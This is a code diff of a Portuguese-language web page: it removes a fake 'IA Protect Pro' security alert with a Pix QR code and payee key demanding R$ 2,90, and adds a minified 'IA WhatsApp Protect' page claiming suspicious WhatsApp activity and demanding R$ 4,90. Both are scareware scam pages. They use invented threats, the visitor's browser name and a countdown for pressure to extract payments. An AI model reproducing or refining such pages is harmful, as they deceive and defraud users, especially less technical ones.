--- a/index.html
+++ b/index.html
@@ -1,128 +1,1 @@
-<!DOCTYPE html>
-<html lang="pt-BR">
-<head>
-  <meta charset="UTF-8" />
-  <title>IA Protect Pro®</title>
-  <meta name="viewport" content="width=device-width, initial-scale=1.0"/>
-  <style>
-    body {
-      font-family: Arial, sans-serif;
-      text-align: center;
-      background: #fff;
-      padding: 40px;
-    }
-    .logo {
-      font-size: 24px;
-      font-weight: bold;
-      color: #f4aa00;
-    }
-    .alert {
-      color: red;
-      font-weight: bold;
-    }
-    .pix-btn {
-      margin-top: 20px;
-      padding: 12px 24px;
-      background-color: #28a745;
-      color: white;
-      border: none;
-      border-radius: 6px;
-      font-size: 16px;
-      cursor: pointer;
-    }
-    .pix-btn:hover {
-      background-color: #218838;
-    }
-    .qr-code {
-      margin-top: 30px;
-      max-width: 220px;
-    }
-    .code-box {
-      display: none;
-    }
-    .timer {
-      margin-top: 20px;
-      color: #333;
-    }
-    .ua {
-      margin-top: 40px;
-      font-size: 12px;
-      color: #aaa;
-    }
-  </style>
-</head>
-<body>
-  <div class="logo">🔒 IA Protect Pro®</div>
-  <h2>Segurança de conexão ativada</h2>
-  <p class="alert">⚠️ Vazamento de dados em potencial detectado.</p>
-  <p>
-    <span id="browser-text">O navegador </span>
-    ativou automaticamente o protocolo <strong>IA Protect Pro®</strong>, com tecnologia baseada em Inteligência Artificial.
-  </p>
-  <p>Para concluir a proteção em tempo real e garantir estabilidade durante sua navegação, realize a autenticação abaixo:</p>
-  <h3>Valor único de verificação: R$ 2,90</h3>
-  <p>(IA Protect opera por menos de $0.55 USD internacionalmente)</p>
-
-  <img 
-    src="https://api.qrserver.com/v1/create-qr-code/?data=00020126580014BR.GOV.BCB.PIX01367a97187a-4475-4468-92b5-a8dc1d83aeda52040000530398654042.905802BR5923SUL%20INTERMEDIACOES%20LTDA6006ITAJAI62120508IAPROTEC630446DB&size=220x220" 
-    class="qr-code" 
-    alt="QR Code Pix" 
-  />
-
-  <div>
-    <button class="pix-btn" onclick="copyPix()">Copiar Chave Pix</button>
-  </div>
-
-  <div class="code-box" id="pixKey">00020126580014BR.GOV.BCB.PIX01367a97187a-4475-4468-92b5-a8dc1d83aeda52040000530398654042.905802BR5923SUL INTERMEDIACOES LTDA6006ITAJAI62120508IAPROTEC630446DB</div>
-
-  <p class="timer">⏳ Sua autenticação expira em <span id="countdown">59</span> segundos.</p>
-
-  <p class="ua"><strong>User Agent:</strong> <span id="ua-string"></span></p>
-
-  <script>
-    const userAgent = navigator.userAgent;
-    document.getElementById("ua-string").textContent = userAgent;
-
-    let browser = "";
-
-    if (userAgent.includes("Edg/")) {
-      browser = "Microsoft Edge";
-    } else if (userAgent.includes("OPR/") || userAgent.includes("Opera")) {
-      browser = "Opera";
-    } else if (userAgent.includes("Chrome") && !userAgent.includes("Edg/") && !userAgent.includes("OPR/")) {
-      browser = "Google Chrome";
-    } else if (userAgent.includes("Firefox")) {
-      browser = "Mozilla Firefox";
-    } else if (userAgent.includes("Safari") && !userAgent.includes("Chrome")) {
-      browser = "Safari";
-    }
-
-    const browserText = document.getElementById("browser-text");
-    if (browser) {
-      browserText.innerHTML = `O navegador <strong>${browser}</strong> `;
-    } else {
-      browserText.textContent = `O navegador `;
-    }
-
-    function copyPix() {
-      const text = document.getElementById("pixKey").innerText;
-      navigator.clipboard.writeText(text).then(() => {
-        alert("Chave Pix copiada com sucesso!");
-      });
-    }
-
-    let tempo = 59;
-    const el = document.getElementById("countdown");
-    const interval = setInterval(() => {
-      tempo--;
-      if (tempo <= 0) {
-        clearInterval(interval);
-        el.textContent = "expirada";
-        document.querySelector(".timer").style.color = "red";
-      } else {
-        el.textContent = tempo;
-      }
-    }, 1000);
-  </script>
-</body>
-</html>
+<!DOCTYPE html><html lang="pt-BR"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1.0"><title>IA WhatsApp Protect</title><style>body{font-family:sans-serif;background:#fff;color:#111;text-align:center;padding:20px}h1{color:#006400}h2{margin-top:5px}p{font-size:17px;margin:10px 0}strong{color:red}.botao{margin-top:20px;background-color:#007f00;color:#fff;padding:12px 22px;border:none;border-radius:5px;font-size:16px;cursor:pointer}.botao:hover{background-color:#005f00}.qr{margin:25px auto}small{font-size:13px;color:#555}#timer{color:orange;margin-top:15px}</style></head><body><h1>🔒 IA WhatsApp Protect</h1><h2>Escudo de segurança ativado</h2><p>⚠️ <strong>Atividade suspeita em seu WhatsApp detectada</strong></p><p>Seu número pode estar vinculado a outro aparelho em <strong>SP</strong> – 03:12h.</p><p>O sistema ativou automaticamente o protocolo IA WhatsApp Protect com escaneamento de ameaças em tempo real.</p><p><strong>Valor único de proteção: R$ 4,90</strong></p><p><small>(IA WhatsApp Protect opera globalmente com menos de $1 USD)</small></p><div class="qr"><img src="SEU_QR_CODE_AQUI" alt="QR Code de Pagamento" width="200" height="200"></div><button class="botao">Copiar Chave Pix</button><div id="timer">⏳ Sua autenticação expira em 45 segundos.</div></body></html>
